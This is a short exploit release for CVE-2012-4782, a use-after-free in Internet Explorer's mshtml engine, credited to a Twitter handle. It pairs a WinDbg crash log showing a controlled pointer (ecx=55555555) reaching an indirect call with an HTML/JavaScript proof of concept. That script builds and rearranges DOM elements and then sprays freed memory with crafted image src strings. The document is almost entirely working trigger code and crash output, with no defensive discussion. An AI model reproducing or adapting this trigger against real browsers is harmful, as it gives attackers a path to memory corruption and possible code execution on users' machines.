CMarkup Use After Free Vulnerability - CVE-2012-4782 ( by https://twitter.com/__suto )
Click on page after load.

(a54.b48): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=55555555 edx=640386e0 esi=0831c4f0 edi=0caecfa8
eip=6383a618 esp=0831c4d0 ebp=0831c4e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246
mshtml!CTreeNode::ComputeFormats+0x9f:
6383a618 8b11            mov     edx,dword ptr [ecx]  ds:0023:55555555=????????
0:017> u
mshtml!CTreeNode::ComputeFormats+0x9f:
6383a618 8b11            mov     edx,dword ptr [ecx]
6383a61a 8b82c4000000    mov     eax,dword ptr [edx+0C4h]
6383a620 ffd0            call    eax
6383a622 8b400c          mov     eax,dword ptr [eax+0Ch]
6383a625 57              push    edi
6383a626 893e            mov     dword ptr [esi],edi
6383a628 894604          mov     dword ptr [esi+4],eax
6383a62b 8b0f            mov     ecx,dword ptr [edi]

===================

<!doctype html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<script>
function testcase(){
    var img = new Array();
    for(var i = 0;i < 100;i++){
        img[i] = document.createElement('img');
        img[i]["src"] = "a";
    }
    document.body.appendChild(document.createElement('progress'));
    document.body.appendChild(document.createElement("<track style='float:right'></track>"));
    document.body.appendChild(document.createElement('progress'));
    document.body.appendChild(document.createElement('table'));
    document.body.appendChild(document.createElement("<track style='float:right'></track>"));
    document.getElementsByTagName('progress').item(0).appendChild(document.createElement('frameset'));
    document.getElementsByTagName('track').item(0).offsetWidth;
    document.getElementsByTagName('progress').item(1).appendChild(document.getElementsByTagName('track').item(0));
    document.body.appendChild(document.createElement("<ins style='margin-left:2222222222px'></ins>"));
    window.scroll(500);
    for(var j = 0;j < 99;j++){
        img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAA\u5555\u5555AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u8141\u4141AAAAAAAA";
    }
}
</script>
</head>
<body onload='testcase();'>
</body>
</html>